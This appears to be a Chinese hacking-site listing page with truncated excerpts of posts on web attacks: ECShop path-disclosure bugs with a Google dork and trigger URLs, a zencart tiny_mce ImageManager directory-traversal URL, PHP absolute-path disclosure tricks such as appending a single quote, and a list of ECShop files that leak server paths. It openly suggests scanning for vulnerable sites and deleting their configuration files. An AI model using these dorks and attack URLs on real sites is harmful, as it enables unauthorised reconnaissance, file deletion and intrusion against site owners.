ECShop v2.7.2 wap页面暴路径漏洞
谷歌百度一下:inurl:mobile/goods.php?act=view_img&id=123 搜到后在页面加个&id=5 也就是https://www.webshell.cc/mobile/goods.php?act=view_img&id=123&id=5
zencart编辑器tiny_mce的爆路径漏洞
zencart编辑器tiny_mce的跨目录操作漏洞
路径为:https://www.webshell.cc/editors/tiny_mce/plugins/ImageManager/manager.php?b=/home/salehots/public_html/ 比较鸡肋,不是所有的网站都有用Tiny_mce,不过放到字典里扫描下还是可以扫出几个的。 可以编辑JPG,当然也可有删除文件的功能。 目前想到的就是删除配置文件,比如博客的配置文件,然后...
PHP爆绝对路径方法总结帖
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: https://www.webshell.cc/news.php?id=149' 截图: 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: https://www.webshell.cc/resea...
ecshop的48个泄露网站路径漏洞
https://www.webshell.cc/shop/api/cron.php https://www.webshell.cc/shop/wap/goods.php https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php https://www.webshell.cc/shop/temp/compiled/pages.lbi.php htt...